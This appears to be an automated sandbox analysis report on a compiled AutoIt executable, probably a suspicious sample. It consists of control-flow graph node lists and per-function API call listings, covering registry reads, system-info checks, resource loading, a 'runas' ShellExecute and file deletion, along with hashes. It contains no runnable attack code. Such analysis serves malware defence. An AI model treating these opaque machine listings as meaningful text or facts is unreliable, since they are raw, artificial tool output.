103148->103150 103149->103124 103151 3c38bb 103149->103151 103150->103150 103152 3e2efd _W_store_winword 60 API calls 103151->103152 103153 3c38c6 103152->103153 103153->103138 103154 3c3907 103153->103154 103156 3c3ed0 59 API calls 103153->103156 103154->103138 103155 3c3914 103154->103155 103157 3c92ce 59 API calls 103155->103157 103158 3c38ea 103156->103158 103160 3c3924 103157->103160 103159 3c8047 59 API calls 103158->103159 103161 3c38f8 103159->103161 103162 3c9050 59 API calls 103160->103162 103163 3c3ed0 59 API calls 103161->103163 103164 3c3932 103162->103164 103163->103154 103335 3c8ee0 103164->103335 103166 3c928a 59 API calls 103168 3c394f 103166->103168 103167 3c8ee0 60 API calls 103167->103168 103168->103166 103168->103167 103169 3c3ed0 59 API calls 103168->103169 103170 3c3995 Mailbox 103168->103170 103169->103168 103170->103040 103172 3c7292 __ftell_nolock 103171->103172 103173 3c72ab 103172->103173 103174 3fea22 _memset 103172->103174 103175 3c4750 60 API calls 103173->103175 103177 3fea3e GetOpenFileNameW 103174->103177 103176 3c72b4 103175->103176 103384 3e0791 103176->103384 103179 3fea8d 103177->103179 103180 3c7bcc 59 API calls 103179->103180 103182 3feaa2 103180->103182 103182->103182 103300->103050 103303 3c3d3e __ftell_nolock 103302->103303 103304 3c7bcc 59 API calls 103303->103304 103310 3c3ea4 Mailbox 103303->103310 103306 3c3d70 103304->103306 103305 3c79f2 59 API calls 103305->103306 103306->103305 103315 3c3da6 Mailbox 103306->103315 103307 3c79f2 59 API calls 103307->103315 103308 3c3e77 103309 3c7de1 59 API calls 103308->103309 103308->103310 103312 3c3e98 103309->103312 103310->103094 103311 3c7de1 59 API calls 103311->103315 103313 3c3f74 59 API calls 103312->103313 103313->103310 103314 3c3f74 59 API calls 103314->103315 103315->103307 103315->103308 103315->103310 103315->103311 103315->103314 103317 3e0db6 Mailbox 59 API calls 103316->103317 103318 3c37fb 103317->103318 103318->103115 103320 3c3eda 103319->103320 103321 3c3ef3 103319->103321 103323 3c8047 59 API calls 103320->103323 103322 3c7bcc 59 API calls 103321->103322 103324 3c3879 103322->103324 103323->103324 103325 3e2efd 103324->103325 103326 3e2f7e 103325->103326 103327 3e2f09 103325->103327 103381 3e2f90 60 API calls 4 library calls 103326->103381 103334 3e2f2e 103327->103334 103379 3e8b28 58 API calls __getptd_noexit 103327->103379 103330 3e2f8b 103330->103140 103331 3e2f15 103380 3e8db6 9 API calls ___strgtold12_l 103331->103380 103333 3e2f20 103333->103140 103334->103140 103336 3ff17c 103335->103336 103338 3c8ef7 103335->103338 103336->103338 103383 3c8bdb 59 API calls Mailbox 103336->103383 103339 3c8fff 103338->103339 103340 3c8ff8 103338->103340 103341 3c9040 103338->103341 103339->103168 103343 3e0db6 Mailbox 59 API calls 103340->103343 103382 3c9d3c 60 API calls Mailbox 103341->103382 103343->103339 103345 3c4ee5 85 API calls 103344->103345 103346 4295ca 103345->103346 103347 429734 96 API calls 103346->103347 103348 4295dc 103347->103348 103349 3c4f0b 74 API calls 103348->103349 103377 3fd186 103348->103377 103350 4295f7 103349->103350 103351 3c4f0b 74 API calls 103350->103351 103352 429607 103351->103352 103353 3c4f0b 74 API calls 103352->103353 103354 429622 103353->103354 103355 3c4f0b 74 API calls 103354->103355 103356 42963d 103355->103356 103357 3c4ee5 85 API calls 103356->103357 103358 429654 103357->103358 103359 3e571c __crtLCMapStringA_stat 58 API calls 103358->103359 103360 42965b 103359->103360 103361 3e571c __crtLCMapStringA_stat 58 API calls 103360->103361 103362 429665 103361->103362 103363 3c4f0b 74 API calls 103362->103363 103364 429679 103363->103364 103365 429109 GetSystemTimeAsFileTime 103364->103365 103366 42968c 103365->103366 103367 4296a1 103366->103367 103368 4296b6 103366->103368 103369 3e2d55 _free 58 API calls 103367->103369 103370 42971b 103368->103370 103371 4296bc 103368->103371 103372 4296a7 103369->103372 103374 3e2d55 _free 58 API calls 103370->103374 103373 428b06 116 API calls 103371->103373 103375 3e2d55 _free 58 API calls 103372->103375 103376 429713 103373->103376 103374->103377 103375->103377 103378 3e2d55 _free 58 API calls 103376->103378 103377->103105 103377->103107 103378->103377 103379->103331 103380->103333 103381->103330 103382->103339 103383->103338 103385 3f1940 __ftell_nolock 103384->103385 103386 3e079e GetLongPathNameW 103385->103386 103387 3c7bcc 59 API calls 103386->103387 103686 3c1055 103691 3c2649 103686->103691 103689 3e2d40 __cinit 67 API calls 103690 3c1064 103689->103690 103692 3c7667 59 API calls 103691->103692 103693 3c26b7 103692->103693 103698 3c3582 103693->103698 103696 3c2754 103697 3c105a 103696->103697 103701 3c3416 103696->103701 103697->103689 103707 3c35b0 103698->103707 103702 3c344e 103701->103702 103706 3c3428 _memmove 103701->103706 103705 3e0db6 Mailbox 59 API calls 103702->103705 103703 3e0db6 Mailbox 59 API calls 103704 3c342e 103703->103704 103704->103696 103705->103706 103706->103703 103708 3c35bd 103707->103708 103709 3c35a1 103707->103709 103708->103709 103710 3c35c4 RegOpenKeyExW 103708->103710 103709->103696 103710->103709 103711 3c35de RegQueryValueExW 103710->103711 103712 3c35ff 103711->103712 103713 3c3614 RegCloseKey 103711->103713 103712->103713 103713->103709 103714 3c1016 103719 3c4974 103714->103719 103717 3e2d40 __cinit 67 API calls 103718 3c1025 103717->103718 103720 3e0db6 Mailbox 59 API calls 103719->103720 103721 3c497c 103720->103721 103722 3c101b 103721->103722 103726 3c4936 103721->103726 103722->103717 103727 3c493f 103726->103727 103728 3c4951 103726->103728 103729 3e2d40 __cinit 67 API calls 103727->103729 103730 3c49a0 103728->103730 103729->103728 103731 3c7667 59 API calls 103730->103731 103732 3c49b8 GetVersionExW 103731->103732 103733 3c7bcc 59 API calls 103732->103733 103734 3c49fb 103733->103734 103735 3c7d2c 59 API calls 103734->103735 103746 3c4a28 103734->103746 103736 3c4a1c 103735->103736 103737 3c7726 59 API calls 103736->103737 103737->103746 103738 3c4a93 GetCurrentProcess IsWow64Process 103739 3c4aac 103738->103739 103741 3c4b2b GetSystemInfo 103739->103741 103742 3c4ac2 103739->103742 103740 3fd864 103743 3c4af8 103741->103743 103754 3c4b37 103742->103754 103743->103722 103746->103738 103746->103740 103747 3c4b1f GetSystemInfo 103749 3c4ae9 103747->103749 103748 3c4ad4 103750 3c4b37 2 API calls 103748->103750 103749->103743 103752 3c4aef FreeLibrary 103749->103752 103751 3c4adc GetNativeSystemInfo 103750->103751 103751->103749 103752->103743 103755 3c4ad0 103754->103755 103756 3c4b40 LoadLibraryA 103754->103756 103755->103747 103755->103748 103756->103755 103757 3c4b51 GetProcAddress 103756->103757 103757->103755 103758 3c1066 103763 3cf76f 103758->103763 103760 3c106c 103761 3e2d40 __cinit 67 API calls 103760->103761 103762 3c1076 103761->103762 103764 3cf790 103763->103764 103796 3dff03 103764->103796 103768 3cf7d7 103769 3c7667 59 API calls 103768->103769 103770 3cf7e1 103769->103770 103771 3c7667 59 API calls 103770->103771 103772 3cf7eb 103771->103772 103773 3c7667 59 API calls 103772->103773 103774 3cf7f5 103773->103774 103775 3c7667 59 API calls 103774->103775 103776 3cf833 103775->103776 103777 3c7667 59 API calls 103776->103777 103778 3cf8fe 103777->103778 103806 3d5f87 103778->103806 103782 3cf930 103783 3c7667 59 API calls 103782->103783 103784 3cf93a 103783->103784 103834 3dfd9e 103784->103834 103786 3cf981 103787 3cf991 GetStdHandle 103786->103787 103788 3cf9dd 103787->103788 103789 4045ab 103787->103789 103790 3cf9e5 OleInitialize 103788->103790 103789->103788 103791 4045b4 103789->103791 103790->103760 103841 426b38 64 API calls Mailbox 103791->103841 103793 4045bb 103842 427207 CreateThread 103793->103842 103795 4045c7 CloseHandle 103795->103790 103843 3dffdc 103796->103843 103799 3dffdc 59 API calls 103800 3dff45 103799->103800 103801 3c7667 59 API calls 103800->103801 103802 3dff51 103801->103802 103803 3c7bcc 59 API calls 103802->103803 103804 3cf796 103803->103804 103805 3e0162 6 API calls 103804->103805 103805->103768 103807 3c7667 59 API calls 103806->103807 103808 3d5f97 103807->103808 103809 3c7667 59 API calls 103808->103809 103810 3d5f9f 103809->103810 103850 3d5a9d 103810->103850 103813 3d5a9d 59 API calls 103814 3d5faf 103813->103814 103815 3c7667 59 API calls 103814->103815 103816 3d5fba 103815->103816 103817 3e0db6 Mailbox 59 API calls 103816->103817 103818 3cf908 103817->103818 103819 3d60f9 103818->103819 103820 3d6107 103819->103820 103821 3c7667 59 API calls 103820->103821 103822 3d6112 103821->103822 103823 3c7667 59 API calls 103822->103823 103824 3d611d 103823->103824 103825 3c7667 59 API calls 103824->103825 103826 3d6128 103825->103826 103827 3c7667 59 API calls 103826->103827 103828 3d6133 103827->103828 103829 3d5a9d 59 API calls 103828->103829 103830 3d613e 103829->103830 103831 3e0db6 Mailbox 59 API calls 103830->103831 103832 3d6145 RegisterWindowMessageW 103831->103832 103832->103782 103835 3dfdae 103834->103835 103836 41576f 103834->103836 103837 3e0db6 Mailbox 59 API calls 103835->103837 103853 429ae7 60 API calls 103836->103853 103839 3dfdb6 103837->103839 103839->103786 103840 41577a 103841->103793 103842->103795 103854 4271ed 65 API calls 103842->103854 103844 3c7667 59 API calls 103843->103844 103845 3dffe7 103844->103845 103846 3c7667 59 API calls 103845->103846 103847 3dffef 103846->103847 103848 3c7667 59 API calls 103847->103848 103849 3dff3b 103848->103849 103849->103799 103851 3c7667 59 API calls 103850->103851 103852 3d5aa5 103851->103852 103852->103813 103853->103840 103855 3c3633 103856 3c366a 103855->103856 103857 3c3688 103856->103857 103858 3c36e7 103856->103858 103895 3c36e5 103856->103895 103862 3c374b PostQuitMessage 103857->103862 103863 3c3695 103857->103863 103860 3c36ed 103858->103860 103861 3fd0cc 103858->103861 103859 3c36ca DefWindowProcW 103896 3c36d8 103859->103896 103864 3c3715 SetTimer RegisterWindowMessageW 103860->103864 103865 3c36f2 103860->103865 103904 3d1070 10 API calls Mailbox 103861->103904 103862->103896 103867 3fd154 103863->103867 103868 3c36a0 103863->103868 103872 3c373e CreatePopupMenu 103864->103872 103864->103896 103869 3fd06f 103865->103869 103870 3c36f9 KillTimer 103865->103870 103909 422527 71 API calls _memset 103867->103909 103873 3c36a8 103868->103873 103874 3c3755 103868->103874 103876 3fd0a8 MoveWindow 103869->103876 103877 3fd074 103869->103877 103900 3c443a Shell_NotifyIconW _memset 103870->103900 103871 3fd0f3 103905 3d1093 341 API calls Mailbox 103871->103905 103872->103896 103880 3fd139 103873->103880 103881 3c36b3 103873->103881 103902 3c44a0 64 API calls _memset 103874->103902 103876->103896 103884 3fd078 103877->103884 103885 3fd097 SetFocus 103877->103885 103880->103859 103908 417c36 59 API calls Mailbox 103880->103908 103887 3fd124 103881->103887 103892 3c36be 103881->103892 103882 3fd166 103882->103859 103882->103896 103888 3fd081 103884->103888 103884->103892 103885->103896 103886 3c370c 103901 3c3114 DeleteObject DestroyWindow Mailbox 103886->103901 103907 422d36 81 API calls _memset 103887->103907 103903 3d1070 10 API calls Mailbox 103888->103903 103892->103859 103906 3c443a Shell_NotifyIconW _memset 103892->103906 103894 3c3764 103894->103896 103895->103859 103898 3fd118 103899 3c434a 68 API calls 103898->103899 103899->103895 103900->103886 103901->103896 103902->103894 103903->103896 103904->103871 103905->103892 103906->103898 103907->103894 103908->103895 103909->103882

                            Executed Functions

                            Function 003C3B3A Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 153windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003C3B68
                            • IsDebuggerPresent.KERNEL32 ref: 003C3B7A
                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,004852F8,004852E0,?,?), ref: 003C3BEB
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                              • Part of subcall function 003D092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003C3C14,004852F8,?,?,?), ref: 003D096E
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 003C3C6F
                            • MessageBoxA.USER32 ref: 003FD281
                            • SetCurrentDirectoryW.KERNEL32(?,004852F8,?,?,?), ref: 003FD2B9
                            • GetForegroundWindow.USER32 ref: 003FD33F
                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 003FD346
                              • Part of subcall function 003C3A46: GetSysColorBrush.USER32 ref: 003C3A50
                              • Part of subcall function 003C3A46: LoadCursorW.USER32 ref: 003C3A5F
                              • Part of subcall function 003C3A46: LoadIconW.USER32 ref: 003C3A76
                              • Part of subcall function 003C3A46: LoadIconW.USER32 ref: 003C3A88
                              • Part of subcall function 003C3A46: LoadIconW.USER32 ref: 003C3A9A
                              • Part of subcall function 003C3A46: LoadImageW.USER32 ref: 003C3AC0
                              • Part of subcall function 003C3A46: RegisterClassExW.USER32(?), ref: 003C3B16
                              • Part of subcall function 003C39D5: CreateWindowExW.USER32 ref: 003C3A03
                              • Part of subcall function 003C39D5: CreateWindowExW.USER32 ref: 003C3A24
                              • Part of subcall function 003C39D5: ShowWindow.USER32(00000000), ref: 003C3A38
                              • Part of subcall function 003C39D5: ShowWindow.USER32(00000000), ref: 003C3A41
                              • Part of subcall function 003C434A: _memset.LIBCMT ref: 003C4370
                              • Part of subcall function 003C434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003C4415
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                            • String ID: This is a third-party compiled AutoIt script.$runas$xH$%E
                            • API String ID: 529118366-416952213
                            • Opcode ID: 0c08a21e678f1df08c7517013b5110247f9e0f93f3b7807f3b4d6313bb8de152
                            • Instruction ID: 56a120adae1065cc1f851bcac3ceb53ac9c94e44648ccc590ac752cc519c65b0
                            • Opcode Fuzzy Hash: 0c08a21e678f1df08c7517013b5110247f9e0f93f3b7807f3b4d6313bb8de152
                            • Instruction Fuzzy Hash: 9A51A035D08108AACB13ABB4EC05FFD7B79AB45710B1084AEF811EA1A2DA745A45CF29
                            Function 003C49A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1035 3c49a0-3c4a00 call 3c7667 GetVersionExW call 3c7bcc 1040 3c4b0b-3c4b0d 1035->1040 1041 3c4a06 1035->1041 1042 3fd767-3fd773 1040->1042 1043 3c4a09-3c4a0e 1041->1043 1044 3fd774-3fd778 1042->1044 1045 3c4a14 1043->1045 1046 3c4b12-3c4b13 1043->1046 1048 3fd77b-3fd787 1044->1048 1049 3fd77a 1044->1049 1047 3c4a15-3c4a4c call 3c7d2c call 3c7726 1045->1047 1046->1047 1057 3fd864-3fd867 1047->1057 1058 3c4a52-3c4a53 1047->1058 1048->1044 1051 3fd789-3fd78e 1048->1051 1049->1048 1051->1043 1053 3fd794-3fd79b 1051->1053 1053->1042 1055 3fd79d 1053->1055 1059 3fd7a2-3fd7a5 1055->1059 1060 3fd869 1057->1060 1061 3fd880-3fd884 1057->1061 1058->1059 1062 3c4a59-3c4a64 1058->1062 1063 3fd7ab-3fd7c9 1059->1063 1064 3c4a93-3c4aaa GetCurrentProcess IsWow64Process 1059->1064 1065 3fd86c 1060->1065 1069 3fd86f-3fd878 1061->1069 1070 3fd886-3fd88f 1061->1070 1066 3fd7ea-3fd7f0 1062->1066 1067 3c4a6a-3c4a6c 1062->1067 1063->1064 1068 3fd7cf-3fd7d5 1063->1068 1071 3c4aac 1064->1071 1072 3c4aaf-3c4ac0 1064->1072 1065->1069 1077 3fd7fa-3fd800 1066->1077 1078 3fd7f2-3fd7f5 1066->1078 1073 3fd805-3fd811 1067->1073 1074 3c4a72-3c4a75 1067->1074 1075 3fd7df-3fd7e5 1068->1075 1076 3fd7d7-3fd7da 1068->1076 1069->1061 1070->1065 1079 3fd891-3fd894 1070->1079 1071->1072 1080 3c4b2b-3c4b35 GetSystemInfo 1072->1080 1081 3c4ac2-3c4ad2 call 3c4b37 1072->1081 1085 3fd81b-3fd821 1073->1085 1086 3fd813-3fd816 1073->1086 1082 3c4a7b-3c4a8a 1074->1082 1083 3fd831-3fd834 1074->1083 1075->1064 1076->1064 1077->1064 1078->1064 1079->1069 1084 3c4af8-3c4b08 1080->1084 1094 3c4b1f-3c4b29 GetSystemInfo 1081->1094 1095 3c4ad4-3c4ae1 call 3c4b37 1081->1095 1088 3fd826-3fd82c 1082->1088 1089 3c4a90 1082->1089 1083->1064 1091 3fd83a-3fd84f 1083->1091 1085->1064 1086->1064 1088->1064 1089->1064 1092 3fd859-3fd85f 1091->1092 1093 3fd851-3fd854 1091->1093 1092->1064 1093->1064 1096 3c4ae9-3c4aed 1094->1096 1100 3c4b18-3c4b1d 1095->1100 1101 3c4ae3-3c4ae7 GetNativeSystemInfo 1095->1101 1096->1084 1099 3c4aef-3c4af2 FreeLibrary 1096->1099 1099->1084 1100->1101 1101->1096
                            APIs
                            • GetVersionExW.KERNEL32(?), ref: 003C49CD
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            • GetCurrentProcess.KERNEL32(?,0044FAEC,00000000,00000000,?), ref: 003C4A9A
                            • IsWow64Process.KERNEL32(00000000), ref: 003C4AA1
                            • GetNativeSystemInfo.KERNEL32(00000000), ref: 003C4AE7
                            • FreeLibrary.KERNEL32(00000000), ref: 003C4AF2
                            • GetSystemInfo.KERNEL32(00000000), ref: 003C4B23
                            • GetSystemInfo.KERNEL32(00000000), ref: 003C4B2F
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                            • String ID:
                            • API String ID: 1986165174-0
                            • Opcode ID: 83e6044c3c90b21c2050998b7b8c97b658d0251079d78219c11395ff2e5a7ed4
                            • Instruction ID: 1f072ad6fe3e2688fb3455dc4cb87a5685b61f971684807500a2e4f1c7bd5f7e
                            • Opcode Fuzzy Hash: 83e6044c3c90b21c2050998b7b8c97b658d0251079d78219c11395ff2e5a7ed4
                            • Instruction Fuzzy Hash: 0891C4359897C4DEC732DB688464AAAFFF5AF3A300B4849ADD0C797A41D220ED08C75D
                            Function 003C4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1137 3c4e89-3c4ea1 CreateStreamOnHGlobal 1138 3c4ec1-3c4ec6 1137->1138 1139 3c4ea3-3c4eba FindResourceExW 1137->1139 1140 3fd933-3fd942 LoadResource 1139->1140 1141 3c4ec0 1139->1141 1140->1141 1142 3fd948-3fd956 SizeofResource 1140->1142 1141->1138 1142->1141 1143 3fd95c-3fd967 LockResource 1142->1143 1143->1141 1144 3fd96d-3fd98b 1143->1144 1144->1141
                            APIs
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 003C4E99
                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003C4D8E,?,?,00000000,00000000), ref: 003C4EB0
                            • LoadResource.KERNEL32(?,00000000,?,?,003C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,003C4E2F), ref: 003FD937
                            • SizeofResource.KERNEL32(?,00000000,?,?,003C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,003C4E2F), ref: 003FD94C
                            • LockResource.KERNEL32(003C4D8E,?,?,003C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,003C4E2F,00000000), ref: 003FD95F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                            • String ID: SCRIPT
                            • API String ID: 3051347437-3967369404
                            • Opcode ID: 9fff31701266b0ab1365899bd87e6dab36eb9fad08bfaad69c7f91284bd31eb6
                            • Instruction ID: 057951220e044955ac377a84f3f480da650a2f2c71d70496859d2ac7ae4bbe80
                            • Opcode Fuzzy Hash: 9fff31701266b0ab1365899bd87e6dab36eb9fad08bfaad69c7f91284bd31eb6
                            • Instruction Fuzzy Hash: 35114C75240700ABD7218B65EC48F677BBAFBC5B11F21827CF505D6250DBA1EC048665
                            Function 003CE6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID: DdH$DdH$DdH$DdH$Variable must be of type 'Object'.
                            • API String ID: 0-528517802
                            • Opcode ID: c86a97d268c1349a95c96c8acd1460971ba2fbad5050b9a8d60698988be8e22f
                            • Instruction ID: 60e85ebe03c05178c7f9f89acb38364b85b690cdf7e317557f17e5ec0d3c3f56
                            • Opcode Fuzzy Hash: c86a97d268c1349a95c96c8acd1460971ba2fbad5050b9a8d60698988be8e22f
                            • Instruction Fuzzy Hash: 2CA26775A00215CFCB25CF58C480FAEB7B6BB58314F25846EE906AB391D735AD82CB94
                            Function 0042445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNELBASE(?,003FE398), ref: 0042446A
                            • FindFirstFileW.KERNELBASE(?,?), ref: 0042447B
                            • FindClose.KERNEL32(00000000), ref: 0042448B
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FileFind$AttributesCloseFirst
                            • String ID:
                            • API String ID: 48322524-0
                            • Opcode ID: 7b97777a908bc907d1898165e19762d4ff4d3a5e67ddd761bb16f98d94aa4b44
                            • Instruction ID: 247f54730824be8cab847abb38822e3f75794732c17de53dd53b8f33029c9c46
                            • Opcode Fuzzy Hash: 7b97777a908bc907d1898165e19762d4ff4d3a5e67ddd761bb16f98d94aa4b44
                            • Instruction Fuzzy Hash: A6E0D8365109106B5210BB78FC0D4EA775CEE46335F500767FD35C11D0E7B85904959E
                            Function 003D09D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                            Download Yara Rule
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003D0A5B
                            • timeGetTime.WINMM ref: 003D0D16
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003D0E53
                            • Sleep.KERNEL32(0000000A), ref: 003D0E61
                            • LockWindowUpdate.USER32(00000000), ref: 003D0EFA
                            • DestroyWindow.USER32 ref: 003D0F06
                            • GetMessageW.USER32 ref: 003D0F20
                            • Sleep.KERNEL32(0000000A,?,?), ref: 00404E83
                            • TranslateMessage.USER32(?), ref: 00405C60
                            • DispatchMessageW.USER32(?), ref: 00405C6E
                            • GetMessageW.USER32 ref: 00405C82
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbH$pbH$pbH$pbH
                            • API String ID: 4212290369-791928415
                            • Opcode ID: 284c094e2db811b8b764532658da60b899f476dc699a32529b5e1dfe9bd8c561
                            • Instruction ID: 48a1764d00b12d6c7cf7300bd8a497e422c3e5162b161ad8f5cbf928307cd138
                            • Opcode Fuzzy Hash: 284c094e2db811b8b764532658da60b899f476dc699a32529b5e1dfe9bd8c561
                            • Instruction Fuzzy Hash: 8DB2BF71608741DBD729DB24C884BABB7E5FF84704F14492EE4899B3A1C774E884CF5A
                            Function 00429155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00428F5F: __time64.LIBCMT ref: 00428F69
                              • Part of subcall function 003C4EE5: _fseek.LIBCMT ref: 003C4EFD
                            • __wsplitpath.LIBCMT ref: 00429234
                              • Part of subcall function 003E40FB: __wsplitpath_helper.LIBCMT ref: 003E413B
                            • _wcscpy.LIBCMT ref: 00429247
                            • _wcscat.LIBCMT ref: 0042925A
                            • __wsplitpath.LIBCMT ref: 0042927F
                            • _wcscat.LIBCMT ref: 00429295
                            • _wcscat.LIBCMT ref: 004292A8
                              • Part of subcall function 00428FA5: _memmove.LIBCMT ref: 00428FDE
                              • Part of subcall function 00428FA5: _memmove.LIBCMT ref: 00428FED
                            • _wcscmp.LIBCMT ref: 004291EF
                              • Part of subcall function 00429734: _wcscmp.LIBCMT ref: 00429824
                              • Part of subcall function 00429734: _wcscmp.LIBCMT ref: 00429837
                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00429452
                            • _wcsncpy.LIBCMT ref: 004294C5
                            • DeleteFileW.KERNEL32(?,?), ref: 004294FB
                            • CopyFileW.KERNEL32 ref: 00429511
                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00429522
                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00429534
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
